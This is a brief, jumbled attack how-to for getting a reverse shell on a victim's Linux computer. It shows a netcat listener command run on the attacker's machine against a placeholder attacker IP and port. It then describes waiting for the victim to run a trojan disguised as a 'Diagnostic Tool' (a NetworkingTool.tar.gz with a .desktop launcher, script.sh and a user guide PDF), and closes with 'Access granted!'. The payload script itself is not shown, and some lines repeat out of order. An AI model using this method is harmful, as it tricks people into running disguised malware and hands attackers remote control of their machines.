Gain access to victim’s computer with reverse shell
- On attacker’s computer (Linux with netcat installed), run the following if
- victim is using linux (our case)
$ sudo nc -lnvp PORT_NUMBER -s ATTACKERS_IP_ADDRESS
- victim is using linux (our case)
- Wait for the victim to run the ‘Diagnostic Tool’ executable file:
- Linux:
- User Guide PDF
- Download this and uncompressed it: NetworkingTool.tar.gz
- Source code:
- NetworkTool.desktop (executable), together with
- script.sh
- Linux:
- Boom! Access granted!